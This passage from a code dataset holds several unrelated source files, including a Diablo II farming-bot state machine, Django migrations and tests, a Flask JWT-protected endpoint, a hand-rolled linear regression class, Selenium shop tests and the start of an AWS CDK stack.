x[2] not in U) else INF)\n if rm[0] > rr[0]:\n rm = rr\n\n return rm\n\n","repo_name":"cherrydan/python-for-work","sub_path":"Algorythms by selfedu/Prima_algorythm/get_min.py","file_name":"get_min.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21908323836","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pray', '0002_pray_pray_time'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='attendance',\n old_name='joined',\n new_name='joined_afternoon',\n ),\n migrations.RemoveField(\n model_name='pray',\n name='pray_time',\n ),\n migrations.AddField(\n model_name='attendance',\n name='joined_morning',\n field=models.BooleanField(default=False),\n ),\n ]\n","repo_name":"wanspaul/holyhappy","sub_path":"pray/migrations/0003_auto_20170512_1428.py","file_name":"0003_auto_20170512_1428.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72434208106","text":"n, m = [int(i) for i in input().split(' ')]\na = [0] * (n + 1)\ns = input().split(' ')\nfor i in range(n):\n a[i + 1] = int(s[i])\n# 用下面这种方法会RE\n# a = [int(i) for i in input().split(' ')]\n#\n# 解法一\n# ans1, ans2, ans3 = 0, 0, 0\n#\n# for i in range(n):\n# for j in range(i, n):\n# a_sum = 0\n# for k in range(i, j+1):\n# a_sum += a[k]\n#\n# if a_sum > ans3 and a_sum <= m:\n# ans1 = i\n# ans2 = j\n# ans3 = a_sum\n# print(ans1+1,ans2,ans3)\n\n# 解法二--使用队列,C++能到满分,python只能到60\ni, j, ansi, ansj = 1, 1, 1, 1\nansmax = 0\na_sum = 0\nwhile i <= n:\n while j <= n and a_sum + a[j] <= m:\n a_sum = a_sum + a[j]\n j += 1\n if a_sum <= m and a_sum > ansmax:\n ansmax = a_sum\n ansi = i\n ansj = j - 1\n a_sum -= a[i]\n i += 1\n\nprint(ansi, ansj, ansmax)\n","repo_name":"jellier/HetaoHomeWork","sub_path":"算法练习/P5745_区间最大和.py","file_name":"P5745_区间最大和.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1499831839","text":"from transitions import Machine\nimport time\nimport keyboard\nimport time\nimport os\nimport random\nimport cv2\nfrom copy import copy\nfrom typing import Union\nfrom collections import OrderedDict\n\nfrom utils.misc import wait\nfrom game_stats import GameStats\nfrom logger import Logger\nfrom config import Config\nfrom screen import Screen\nfrom template_finder import TemplateFinder\nfrom char import IChar\nfrom item import ItemFinder\nfrom item.pickit import PickIt\nfrom ui import UiManager\nfrom ui import BeltManager\nfrom pather import Pather, Location\nfrom npc_manager import NpcManager\nfrom health_manager import HealthManager\nfrom death_manager import DeathManager\nfrom char.sorceress import LightSorc, BlizzSorc, NovaSorc\nfrom char.trapsin import Trapsin\nfrom char.hammerdin import Hammerdin\nfrom char.barbarian import Barbarian\nfrom char.necro import Necro\nfrom char.basic import Basic\nfrom char.basic_ranged import Basic_Ranged\n\nfrom run import Pindle, ShenkEld, Trav, Nihlatak, Arcane, Diablo, LowerKurast\nfrom town import TownManager, A1, A2, A3, A4, A5\n\n# Added for dclone ip hunt\nfrom messenger import Messenger\nfrom utils.dclone_ip import get_d2r_game_ip\n\nclass Bot:\n def __init__(self, screen: Screen, game_stats: GameStats, template_finder: TemplateFinder, pick_corpse: bool = False):\n self._screen = screen\n self._game_stats = game_stats\n self._messenger = Messenger()\n self._config = Config()\n self._template_finder = template_finder\n self._item_finder = ItemFinder()\n self._ui_manager = UiManager(self._screen, self._template_finder, self._game_stats)\n self._belt_manager = BeltManager(self._screen, self._template_finder)\n self._pather = Pather(self._screen, self._template_finder)\n self._pickit = PickIt(self._screen, self._item_finder, self._ui_manager, self._belt_manager)\n\n # Create Character\n if self._config.char[\"type\"] in [\"sorceress\", \"light_sorc\"]:\n self._char: IChar = LightSorc(self._config.light_sorc, self._screen, self._template_finder, self._ui_manager, self._pather)\n elif self._config.char[\"type\"] == \"blizz_sorc\":\n self._char: IChar = BlizzSorc(self._config.blizz_sorc, self._screen, self._template_finder, self._ui_manager, self._pather)\n elif self._config.char[\"type\"] == \"nova_sorc\":\n self._char: IChar = NovaSorc(self._config.nova_sorc, self._screen, self._template_finder, self._ui_manager, self._pather)\n elif self._config.char[\"type\"] == \"hammerdin\":\n self._char: IChar = Hammerdin(self._config.hammerdin, self._screen, self._template_finder, self._ui_manager, self._pather)\n elif self._config.char[\"type\"] == \"trapsin\":\n self._char: IChar = Trapsin(self._config.trapsin, self._screen, self._template_finder, self._ui_manager, self._pather)\n elif self._config.char[\"type\"] == \"barbarian\":\n self._char: IChar = Barbarian(self._config.barbarian, self._screen, self._template_finder, self._ui_manager, self._pather)\n elif self._config.char[\"type\"] == \"necro\":\n self._char: IChar = Necro(self._config.necro, self._screen, self._template_finder, self._ui_manager, self._pather)\n elif self._config.char[\"type\"] == \"basic\":\n self._char: IChar = Basic(self._config.basic, self._screen, self._template_finder, self._ui_manager, self._pather)\n elif self._config.char[\"type\"] == \"basic_ranged\":\n self._char: IChar = Basic_Ranged(self._config.basic_ranged, self._screen, self._template_finder, self._ui_manager, self._pather)\n else:\n Logger.error(f'{self._config.char[\"type\"]} is not supported! Closing down bot.')\n os._exit(1)\n\n # Create Town Manager\n npc_manager = NpcManager(screen, self._template_finder)\n a5 = A5(self._screen, self._template_finder, self._pather, self._char, npc_manager)\n a4 = A4(self._screen, self._template_finder, self._pather, self._char, npc_manager)\n a3 = A3(self._screen, self._template_finder, self._pather, self._char, npc_manager)\n a2 = A2(self._screen, self._template_finder, self._pather, self._char, npc_manager)\n a1 = A1(self._screen, self._template_finder, self._pather, self._char, npc_manager)\n self._town_manager = TownManager(self._template_finder, self._ui_manager, self._item_finder, a1, a2, a3, a4, a5)\n self._route_config = self._config.routes\n self._route_order = self._config.routes_order\n\n # Create runs\n if self._route_config[\"run_shenk\"] and not self._route_config[\"run_eldritch\"]:\n Logger.error(\"Running shenk without eldtritch is not supported. Either run none or both\")\n os._exit(1)\n self._do_runs = {\n \"run_trav\": self._route_config[\"run_trav\"],\n \"run_pindle\": self._route_config[\"run_pindle\"],\n \"run_shenk\": self._route_config[\"run_shenk\"] or self._route_config[\"run_eldritch\"],\n \"run_nihlatak\": self._route_config[\"run_nihlatak\"],\n \"run_arcane\": self._route_config[\"run_arcane\"],\n \"run_diablo\": self._route_config[\"run_diablo\"],\n \"run_lowerkurast\": self._route_config[\"run_lowerkurast\"],\n }\n # Adapt order to the config\n self._do_runs = OrderedDict((k, self._do_runs[k]) for k in self._route_order if k in self._do_runs and self._do_runs[k])\n self._do_runs_reset = copy(self._do_runs)\n Logger.info(f\"Doing runs: {self._do_runs_reset.keys()}\")\n if self._config.general[\"randomize_runs\"]:\n self.shuffle_runs()\n self._pindle = Pindle(self._template_finder, self._pather, self._town_manager, self._ui_manager, self._char, self._pickit)\n self._shenk = ShenkEld(self._template_finder, self._pather, self._town_manager, self._ui_manager, self._char, self._pickit)\n self._trav = Trav(self._template_finder, self._pather, self._town_manager, self._ui_manager, self._char, self._pickit)\n self._nihlatak = Nihlatak(self._screen, self._template_finder, self._pather, self._town_manager, self._ui_manager, self._char, self._pickit)\n self._arcane = Arcane(self._screen, self._template_finder, self._pather, self._town_manager, self._ui_manager, self._char, self._pickit)\n self._diablo = Diablo(self._screen, self._template_finder, self._pather, self._town_manager, self._ui_manager, self._char, self._pickit)\n self._lowerkurast = LowerKurast(self._screen, self._template_finder, self._pather, self._town_manager, self._ui_manager, self._char, self._pickit)\n\n # Create member variables\n self._pick_corpse = pick_corpse\n self._picked_up_items = False\n self._curr_loc: Union[bool, Location] = None\n self._tps_left = 10 # assume half full tp book\n self._pre_buffed = False\n self._stopping = False\n self._pausing = False\n self._current_threads = []\n self._no_stash_counter = 0\n self._ran_no_pickup = False\n\n # Create State Machine\n self._states=['hero_selection', 'town', 'pindle', 'shenk', 'trav', 'nihlatak', 'arcane', 'diablo','lowerkurast']\n self._transitions = [\n { 'trigger': 'create_game', 'source': 'hero_selection', 'dest': 'town', 'before': \"on_create_game\"},\n # Tasks within town\n { 'trigger': 'maintenance', 'source': 'town', 'dest': 'town', 'before': \"on_maintenance\"},\n # Different runs\n { 'trigger': 'run_pindle', 'source': 'town', 'dest': 'pindle', 'before': \"on_run_pindle\"},\n { 'trigger': 'run_shenk', 'source': 'town', 'dest': 'shenk', 'before': \"on_run_shenk\"},\n { 'trigger': 'run_trav', 'source': 'town', 'dest': 'trav', 'before': \"on_run_trav\"},\n { 'trigger': 'run_nihlatak', 'source': 'town', 'dest': 'nihlatak', 'before': \"on_run_nihlatak\"},\n { 'trigger': 'run_arcane', 'source': 'town', 'dest': 'arcane', 'before': \"on_run_arcane\"},\n { 'trigger': 'run_diablo', 'source': 'town', 'dest': 'nihlatak', 'before': \"on_run_diablo\"},\n { 'trigger': 'run_lowerkurast', 'source': 'town', 'dest': 'lowerkurast', 'before': \"on_run_lowerkurast\"},\n # End run / game\n { 'trigger': 'end_run', 'source': ['shenk', 'pindle', 'nihlatak', 'trav', 'arcane', 'diablo','lowerkurast'], 'dest': 'town', 'before': \"on_end_run\"},\n { 'trigger': 'end_game', 'source': ['town', 'shenk', 'pindle', 'nihlatak', 'trav', 'arcane', 'diablo','lowerkurast','end_run'], 'dest': 'hero_selection', 'before': \"on_end_game\"},\n ]\n self.machine = Machine(model=self, states=self._states, initial=\"hero_selection\", transitions=self._transitions, queued=True)\n\n def draw_graph(self):\n # Draw the whole graph, graphviz binaries must be installed and added to path for this!\n from transitions.extensions import GraphMachine\n self.machine = GraphMachine(model=self, states=self._states, initial=\"hero_selection\", transitions=self._transitions, queued=True)\n self.machine.get_graph().draw('my_state_diagram.png', prog='dot')\n\n def get_belt_manager(self) -> BeltManager:\n return self._belt_manager\n\n def get_curr_location(self):\n return self._curr_loc\n\n def start(self):\n self.trigger('create_game')\n\n def stop(self):\n self._stopping = True\n\n def toggle_pause(self):\n self._pausing = not self._pausing\n if self._pausing:\n Logger.info(f\"Pause at next state change...\")\n else:\n Logger.info(f\"Resume\")\n self._game_stats.resume_timer()\n\n def trigger_or_stop(self, name: str, **kwargs):\n if self._pausing:\n Logger.info(f\"{self._config.general['name']} is now pausing\")\n self._game_stats.pause_timer()\n while self._pausing:\n time.sleep(0.2)\n if not self._stopping:\n self.trigger(name, **kwargs)\n\n def current_game_length(self):\n return self._game_stats.get_current_game_length()\n\n def shuffle_runs(self):\n tmp = list(self._do_runs.items())\n random.shuffle(tmp)\n self._do_runs = OrderedDict(tmp)\n\n def is_last_run(self):\n found_unfinished_run = False\n for key in self._do_runs:\n if self._do_runs[key]:\n found_unfinished_run = True\n break\n return not found_unfinished_run\n\n def on_create_game(self):\n keyboard.release(self._config.char[\"stand_still\"])\n # Start a game from hero selection\n self._game_stats.log_start_game()\n self._template_finder.search_and_wait([\"MAIN_MENU_TOP_LEFT\",\"MAIN_MENU_TOP_LEFT_DARK\"], roi=self._config.ui_roi[\"main_menu_top_left\"])\n if not self._ui_manager.start_game(): return\n self._curr_loc = self._town_manager.wait_for_town_spawn()\n\n # Check for the current game ip and pause if we are able to obtain the hot ip\n if self._config.dclone[\"region_ips\"] != \"\" and self._config.dclone[\"dclone_hotip\"] != \"\":\n cur_game_ip = get_d2r_game_ip()\n hot_ip = self._config.dclone[\"dclone_hotip\"]\n Logger.debug(f\"Current Game IP: {cur_game_ip} and HOTIP: {hot_ip}\")\n if hot_ip == cur_game_ip:\n self._messenger.send_message(f\"Dclone IP Found on IP: {cur_game_ip}\")\n print(\"Press Enter\")\n input()\n os._exit(1)\n else:\n Logger.info(f\"Please Enter the region ip and hot ip on config to use\")\n\n # Run /nopickup command to avoid picking up stuff on accident\n if not self._ran_no_pickup:\n self._ran_no_pickup = True\n if self._ui_manager.enable_no_pickup():\n Logger.info(\"Activated /nopickup\")\n else:\n Logger.error(\"Failed to detect if /nopickup command was applied or not\")\n self.trigger_or_stop(\"maintenance\")\n\n def on_maintenance(self):\n # Handle picking up corpse in case of death\n if self._pick_corpse:\n self._pick_corpse = False\n time.sleep(1.6)\n DeathManager.pick_up_corpse(self._screen)\n wait(1.2, 1.5)\n self._belt_manager.fill_up_belt_from_inventory(self._config.char[\"num_loot_columns\"])\n wait(0.5)\n # Look at belt to figure out how many pots need to be picked up\n self._belt_manager.update_pot_needs()\n\n # Check if should need some healing\n img = self._screen.grab()\n buy_pots = self._belt_manager.should_buy_pots()\n if HealthManager.get_health(img) < 0.6 or HealthManager.get_mana(img) < 0.2 or buy_pots:\n if buy_pots:\n Logger.info(\"Buy pots at next possible Vendor\")\n pot_needs = self._belt_manager.get_pot_needs()\n self._curr_loc = self._town_manager.buy_pots(self._curr_loc, pot_needs[\"health\"], pot_needs[\"mana\"])\n wait(0.5, 0.8)\n self._belt_manager.update_pot_needs()\n # TODO: Remove this, currently workaround cause too lazy to add all the pathes from MALAH\n if self._curr_loc == Location.A5_MALAH:\n if self._pather.traverse_nodes((Location.A5_MALAH, Location.A5_TOWN_START), self._char, force_move=True):\n self._curr_loc = Location.A5_TOWN_START\n else:\n self._curr_loc = False\n else:\n Logger.info(\"Healing at next possible Vendor\")\n self._curr_loc = self._town_manager.heal(self._curr_loc)\n if not self._curr_loc:\n return self.trigger_or_stop(\"end_game\", failed=True)\n\n # Check if we should force stash (e.g. when picking up items by accident or after failed runs or chicken/death)\n force_stash = False\n self._no_stash_counter += 1\n if not self._picked_up_items and (self._no_stash_counter > 4 or self._pick_corpse):\n self._no_stash_counter = 0\n force_stash = self._ui_manager.should_stash(self._config.char[\"num_loot_columns\"])\n # Stash stuff, either when item was picked up or after X runs without stashing because of unwanted loot in inventory\n if self._picked_up_items or force_stash:\n if self._config.char[\"id_items\"]:\n Logger.info(\"Identifying items\")\n self._curr_loc = self._town_manager.identify(self._curr_loc)\n if not self._curr_loc:\n return self.trigger_or_stop(\"end_game\", failed=True)\n Logger.info(\"Stashing items\")\n self._curr_loc = self._town_manager.stash(self._curr_loc)\n if not self._curr_loc:\n return self.trigger_or_stop(\"end_game\", failed=True)\n self._no_stash_counter = 0\n self._picked_up_items = False\n wait(1.0)\n\n # Check if we are out of tps or need repairing\n need_repair = self._ui_manager.repair_needed()\n if self._tps_left < random.randint(3, 5) or need_repair or self._config.char[\"always_repair\"]:\n if need_repair: Logger.info(\"Repair needed. Gear is about to break\")\n else: Logger.info(\"Repairing and buying TPs at next Vendor\")\n self._curr_loc = self._town_manager.repair_and_fill_tps(self._curr_loc)\n if not self._curr_loc:\n return self.trigger_or_stop(\"end_game\", failed=True)\n self._tps_left = 20\n wait(1.0)\n\n # Check if merc needs to be revived\n merc_alive = self._template_finder.search([\"MERC_A2\",\"MERC_A1\",\"MERC_A5\",\"MERC_A3\"], self._screen.grab(), threshold=0.9, roi=self._config.ui_roi[\"merc_icon\"]).valid\n if not merc_alive and self._config.char[\"use_merc\"]:\n Logger.info(\"Resurrect merc\")\n self._game_stats.log_merc_death()\n self._curr_loc = self._town_manager.resurrect(self._curr_loc)\n if not self._curr_loc:\n return self.trigger_or_stop(\"end_game\", failed=True)\n\n # Start a new run\n started_run = False\n for key in self._do_runs:\n if self._do_runs[key]:\n self.trigger_or_stop(key)\n started_run = True\n break\n if not started_run:\n self.trigger_or_stop(\"end_game\")\n\n def on_end_game(self, failed: bool = False):\n if self._config.general[\"info_screenshots\"] and failed:\n cv2.imwrite(\"./info_screenshots/info_failed_game_\" + time.strftime(\"%Y%m%d_%H%M%S\") + \".png\", self._screen.grab())\n self._curr_loc = False\n self._pre_buffed = False\n self._ui_manager.save_and_exit()\n self._game_stats.log_end_game(failed=failed)\n self._do_runs = copy(self._do_runs_reset)\n if self._config.general[\"randomize_runs\"]:\n self.shuffle_runs()\n wait(0.2, 0.5)\n self.trigger_or_stop(\"create_game\")\n\n def on_end_run(self):\n if not self._config.char[\"pre_buff_every_run\"]:\n self._pre_buffed = True\n success = self._char.tp_town()\n if success:\n self._tps_left -= 1\n self._curr_loc = self._town_manager.wait_for_tp(self._curr_loc)\n if self._curr_loc:\n return self.trigger_or_stop(\"maintenance\")\n if not self._ui_manager.has_tps():\n self._tps_left = 0\n self.trigger_or_stop(\"end_game\", failed=True)\n\n # All the runs go here\n # ==================================\n def _ending_run_helper(self, res: Union[bool, tuple[Location, bool]]):\n # either fill member variables with result data or mark run as failed\n failed_run = True\n if res:\n failed_run = False\n self._curr_loc, self._picked_up_items = res\n # in case its the last run or the run was failed, end game, otherwise move to next run\n if self.is_last_run() or failed_run:\n if failed_run:\n self._no_stash_counter = 10 # this will force a check if we should stash on next game\n self.trigger_or_stop(\"end_game\", failed=failed_run)\n else:\n self.trigger_or_stop(\"end_run\")\n\n def on_run_pindle(self):\n res = False\n self._do_runs[\"run_pindle\"] = False\n self._game_stats.update_location(\"Pin\" if self._config.general['discord_status_condensed'] else \"Pindle\")\n self._curr_loc = self._pindle.approach(self._curr_loc)\n if self._curr_loc:\n res = self._pindle.battle(not self._pre_buffed)\n self._ending_run_helper(res)\n\n def on_run_shenk(self):\n res = False\n self._do_runs[\"run_shenk\"] = False\n self._curr_loc = self._shenk.approach(self._curr_loc)\n if self._curr_loc:\n res = self._shenk.battle(self._route_config[\"run_shenk\"], not self._pre_buffed, self._game_stats)\n self._ending_run_helper(res)\n\n def on_run_trav(self):\n res = False\n self._do_runs[\"run_trav\"] = False\n self._game_stats.update_location(\"Trav\" if self._config.general['discord_status_condensed'] else \"Travincal\")\n self._curr_loc = self._trav.approach(self._curr_loc)\n if self._curr_loc:\n res = self._trav.battle(not self._pre_buffed)\n self._ending_run_helper(res)\n\n def on_run_nihlatak(self):\n res = False\n self._do_runs[\"run_nihlatak\"] = False\n self._game_stats.update_location(\"Nihl\" if self._config.general['discord_status_condensed'] else \"Nihlatak\")\n self._curr_loc = self._nihlatak.approach(self._curr_loc)\n if self._curr_loc:\n res = self._nihlatak.battle(not self._pre_buffed)\n self._ending_run_helper(res)\n\n def on_run_arcane(self):\n res = False\n self._do_runs[\"run_arcane\"] = False\n self._game_stats.update_location(\"Arc\" if self._config.general['discord_status_condensed'] else \"Arcane\")\n self._curr_loc = self._arcane.approach(self._curr_loc)\n if self._curr_loc:\n res = self._arcane.battle(not self._pre_buffed)\n self._tps_left -= self._arcane.used_tps\n self._ending_run_helper(res)\n \n def on_run_diablo(self):\n res = False\n self._do_runs[\"run_diablo\"] = False\n self._game_stats.update_location(\"Dia\" if self._config.general['discord_status_condensed'] else \"Diablo\")\n self._curr_loc = self._diablo.approach(self._curr_loc)\n if self._curr_loc:\n res = self._diablo.battle(not self._pre_buffed)\n self._tps_left -= 1 # we use one tp at pentagram for calibration\n self._ending_run_helper(res)\n\n def on_run_lowerkurast(self):\n res = False\n self._do_runs[\"run_lowerkurast\"] = False\n self._game_stats.update_location(\"LK\" if self._config.general['discord_status_condensed'] else \"LowerKurast\")\n self._curr_loc = self._lowerkurast.approach(self._curr_loc)\n if self._curr_loc:\n res = self._lowerkurast.battle(not self._pre_buffed)\n self._tps_left -= self._lowerkurast.used_tps\n self._ending_run_helper(res)","repo_name":"jagarop/botty-memread_lk","sub_path":"src/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":21105,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"13043095437","text":"from api.note import note_bp\nfrom flask import abort, jsonify, request\nfrom jwtauth import verify_jwt\nfrom models import Note\n\n\n@note_bp.route(\"/list\", methods=[\"GET\"])\ndef noteList():\n # token校验\n header_auth = request.headers.get(\"Authorization\")\n if header_auth is None:\n abort(401, description=\"Unauthorized.\")\n return\n token = header_auth[7:]\n payload = verify_jwt(token)\n if payload is None:\n abort(401, description=\"Invaild Token.\")\n return\n userID = payload[\"uid\"]\n\n # 数据库操作\n try:\n all_note = Note.query.filter_by(userID=userID).all()\n except Exception as e:\n abort(500, description=f\"Database Operation Error. {e}\")\n return\n\n # 数据处理操作\n try:\n res = []\n for note in all_note:\n res.append({\n \"id\": note.id,\n \"title\": note.title,\n \"content\": note.content,\n \"date\": note.date,\n \"isStared\": note.isStared,\n })\n return jsonify({\"data\": res, \"status\": 0, \"message\": \"OK\"})\n except Exception as e:\n abort(500, description=f\"Process Data Error. {e}\")\n return\n","repo_name":"ChrisKimZHT/Todo-List-Backend","sub_path":"api/note/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"6306867375","text":"from django.test import TestCase\n\nfrom .models import BigS, UnicodeSlugField\n\n\nclass SlugFieldTests(TestCase):\n def test_slugfield_max_length(self):\n \"\"\"\n SlugField honors max_length.\n \"\"\"\n bs = BigS.objects.create(s=\"slug\" * 50)\n bs = BigS.objects.get(pk=bs.pk)\n self.assertEqual(bs.s, \"slug\" * 50)\n\n def test_slugfield_unicode_max_length(self):\n \"\"\"\n SlugField with allow_unicode=True honors max_length.\n \"\"\"\n bs = UnicodeSlugField.objects.create(s=\"你好你好\" * 50)\n bs = UnicodeSlugField.objects.get(pk=bs.pk)\n self.assertEqual(bs.s, \"你好你好\" * 50)\n","repo_name":"django/django","sub_path":"tests/model_fields/test_slugfield.py","file_name":"test_slugfield.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"2993798818","text":"# -*- coding: utf-8 -*-\n\nimport webview\nimport logging\nfrom pathlib import Path\n\napp_name = 'swallow'\nhome_path = Path.home() / f'.{app_name}'\nhome_path.mkdir(exist_ok=True)\n\nlog_file = home_path / 'out.log'\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%Y/%m/%d %H:%M:%S',\n filename=log_file.absolute()\n )\n\nfrom src.globals import gbl\n\nbase_dir = Path(__file__).parent\nlogging.info(f'swallow base dir:{base_dir}')\ngbl.base_dir = base_dir\n\nfrom src.api import Api, server\n\napi = Api(base_dir, home_path)\n\n\ndef on_closing():\n try:\n # close hugo preview process\n api.hugos.close_pre()\n logging.info('pywebview window is closing')\n except Exception as e:\n logging.warning(f'on closing fail:{e}')\n\n\nif __name__ == '__main__':\n window = webview.create_window(app_name, server, js_api=api, min_size=(1000, 600), width=1200, height=800,\n confirm_close=True)\n window.events.closed += on_closing\n api.window = window\n webview.start(debug=True)\n","repo_name":"rangwea/swallow-pywebview","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"32839534335","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\n\"\"\"Timing Implementation\"\"\"\n\nfrom eclcli.common import command\n\n\nclass Timing(command.Lister):\n \"\"\"Show timing data\"\"\"\n\n def take_action(self, parsed_args):\n column_headers = (\n 'URL',\n 'Seconds',\n )\n\n results = []\n total = 0.0\n for url, td in self.app.timing_data:\n # NOTE(dtroyer): Take the long way here because total_seconds()\n # was added in py27.\n sec = (td.microseconds + (td.seconds + td.days *\n 86400) * 1e6) / 1e6\n total += sec\n results.append((url, sec))\n results.append(('Total', total))\n return (\n column_headers,\n results,\n )\n","repo_name":"nttcom/eclcli","sub_path":"eclcli/common/timing.py","file_name":"timing.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"12544689385","text":"class MyRegression:\n def __init__(self):\n self.intercept_ = 0.0\n self.coef_ = []\n\n def fit(self, X, Y):\n for el in X:\n el.insert(0, 1)\n Y = self.transpose([Y])\n rez1 = self.transpose(X)\n rez2 = self.multiply(rez1, X)\n rez3 = self.inverse(rez2)\n rez4 = self.multiply(rez3, rez1)\n rez5 = self.multiply(rez4, Y)\n self.intercept_ = rez5[0][0]\n for r in rez5[1:]:\n self.coef_.append(r[0])\n\n def predict(self, inputs):\n result = []\n for input in inputs:\n sum = self.intercept_\n for x, coef in zip(input, self.coef_):\n sum += x * coef\n result.append(sum)\n return result\n\n\n def transpose(self, matrix):\n transpose = []\n for j in range(len(matrix[0])): # no columns\n line = []\n for i in range(len(matrix)): # no rows\n line.append(matrix[i][j])\n transpose.append(line)\n return transpose\n\n def minor(self, matrix, i, j):\n result = []\n for x in range(len(matrix)):\n if x != i:\n line = []\n for y in range(len(matrix[0])):\n if y != j:\n line.append(matrix[x][y])\n result.append(line)\n return result\n\n def determinant(self, matrix):\n if len(matrix) == 1:\n return matrix[0][0]\n\n if len(matrix) == 2:\n return matrix[0][0] * matrix[1][1] - matrix[0][1] * matrix[1][0]\n\n det = 0.0\n for j in range(len(matrix)): # dezvoltam dupa prima linie\n det += matrix[0][j] * ((-1) ** j) * self.determinant(self.minor(matrix, 0, j))\n return det\n\n def inverse(self, matrix):\n if len(matrix) != len(matrix[0]):\n raise Exception(\"Different number of rows and columns!\")\n\n detMatrix = self.determinant(matrix)\n if detMatrix == 0:\n raise Exception(\"Matrix is not invertible!\")\n\n result = self.adj(matrix)\n for i in range(len(result)):\n for j in range(len(result)):\n result[i][j] /= detMatrix\n return result\n\n def adj(self, matrix):\n matrix = self.transpose(matrix)\n result = []\n for i in range(len(matrix)):\n line = []\n for j in range(len(matrix)):\n elem = ((-1) ** (i + j)) * self.determinant(self.minor(matrix, i, j))\n line.append(elem)\n result.append(line)\n return result\n\n def multiply(self, a, b):\n if len(a[0]) != len(b):\n raise Exception(\"Can not multiply these matrices!\")\n\n result = []\n for i in range(len(a)):\n result.append([0 for _ in range(len(b[0]))])\n\n for i in range(len(a)):\n for j in range(len(b[0])):\n for k in range(len(b)):\n result[i][j] += a[i][k] * b[k][j]\n return result\n\n","repo_name":"mariaruncan/ubb-second-year","sub_path":"sem4/AI/Lab/ai-lab7/myregression.py","file_name":"myregression.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27221931946","text":"import logging\nimport time\nimport allure\nfrom page.cart_page import CartPage\nfrom page.home_page import HomePage\nfrom page.index_page import IndexPage\nfrom page.order_page import OrderPage\nfrom page.order_pay_page import OrderPayPage\nfrom utils.driver_utils import DriverUtils\n\n\n@allure.feature('订单模块')\nclass TestOrder:\n\n def setup(self):\n self.driver = DriverUtils.get_driver()\n self.index_page = IndexPage(self.driver)\n self.cart_page = CartPage(self.driver)\n self.order_page = OrderPage(self.driver)\n self.order_pay_page = OrderPayPage(self.driver)\n self.home_page = HomePage(self.driver)\n self.driver.get('http://localhost/')\n\n def teardown(self):\n time.sleep(2)\n DriverUtils.quit_driver()\n\n def teardown_class(self):\n DriverUtils.set_driver_select(False)\n DriverUtils.get_driver().get_screenshot_as_file('./screenshot/tpshop.png')\n DriverUtils.quit_driver()\n\n @allure.story('购物车结算,订单提交成功')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_submit_order(self):\n self.index_page.click_my_cart_btn()\n self.cart_page.click_go_to_pay_btn()\n time.sleep(6)\n logging.info('wait 6s for page display')\n self.order_page.click_submit_order_btn()\n assert '订单提交成功,请您尽快付款!' == self.order_pay_page.get_tips_info()\n\n @allure.story('选择货到付款,支付成功')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_pay(self):\n self.index_page.click_my_order_link()\n self.index_page.switch_window()\n logging.info('switch to other window')\n self.home_page.click_to_be_pay_link()\n self.home_page.click_pay_btn()\n self.home_page.switch_window()\n logging.info('switch to other window')\n self.order_pay_page.click_arrived_pay()\n self.order_pay_page.click_pay_btn()\n time.sleep(3)\n logging.info('wait 3s for page display')\n assert '订单提交成功,我们将在第一时间给你发货!' == self.order_pay_page.get_tips_info()\n","repo_name":"YoungWeiHuan/tpshop_auto_test","sub_path":"scripts/test_order.py","file_name":"test_order.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"3584288694","text":"from aws_cdk import (\n # Duration,\n # aws_sqs as sqs,\n Stack,\n aws_lambda as lambda_,\n RemovalPolicy,\n Duration,\n aws_events as events_,\n aws_events_targets as targets_,\n aws_s3 as s3,\n aws_s3_deployment as s3deploy,\n # aws_sqs as sqs,\n aws_sns_subscriptions as sns_subs_,\n aws_sns as sns_,\n aws_cloudwatch_actions as cw_actions,\n aws_dynamodb as dynamodb,\n aws_iam as iam_,\n aws_cloudwatch as cloudwatch,\n aws_cloudwatch_actions as cw_actions,\n aws_codedeploy as codedeploy,\n aws_apigateway as gateway,\n # aws_apigateway.Cors,\n \n)\nfrom constructs import Construct\nfrom s3_resources import s3_res\nimport os\nimport boto3\n# from gateway import Cors as cors_\n# from gateway import CorsOptions as corO_\n# from corO import OPTIONS\n\nclass Sprint5MubarizStack(Stack):\n\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n # def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n # policy = \"CloudWatchFullAccess\"\n # role = self.create_lambda_role(policy)\n role = 